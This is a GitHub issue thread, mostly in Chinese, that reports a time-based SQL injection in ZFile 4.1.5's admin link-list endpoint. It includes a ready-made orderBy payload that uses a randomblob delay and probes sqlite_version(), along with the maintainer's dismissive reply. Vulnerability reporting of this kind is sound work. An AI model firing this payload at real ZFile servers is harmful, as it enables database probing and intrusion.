### ISSUE TITLE
SQL Injection

### ISSUE THREAD

**Issue by lousix** [zfile-dev/zfile#650]
## 环境信息
- ZFile 版本：`4.1.5`
- 部署方式：`Docker`
- 操作系统/设备：`Linux`
- 浏览器/版本号：`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36`

## 复现步骤
payload: /admin/link/list?storageId=&page=1&limit=10&key=&url=&date=&dateFrom=&dateTo=&total=0&orderDirection=asc&orderBy=2+or+(case+when(substr(sqlite_version(),1,1)='3')+then+randomblob(300000000)+else+0+end)

## 预期结果
结果相应会比一般的慢，通过时间上的差异进行time-based sqli，本地测试响应时长为3500ms左右
<img width="1916" alt="image" src="https://github.com/zfile-dev/zfile/assets/78363786/45142c3a-95a8-4620-92ea-7465fa75b901">

## 实际结果
实际响应为20ms左右
<img width="1918" alt="image" src="https://github.com/zfile-dev/zfile/assets/78363786/d9a3e0fb-97c5-4f3d-989d-ad1bdab5d474">

## 额外信息
无

**Comment by zhaojun1998** [comment]
emmmm，如果是用户接口其他安全问题我理解（如果安全漏洞，希望你发我 email），但是这是管理员接口，谁会这么做呢？

**Comment by lousix** [comment]
> emmmm，如果是用户接口其他安全问题我理解（如果安全漏洞，希望你发我 email），但是这是管理员接口，谁会这么做呢？
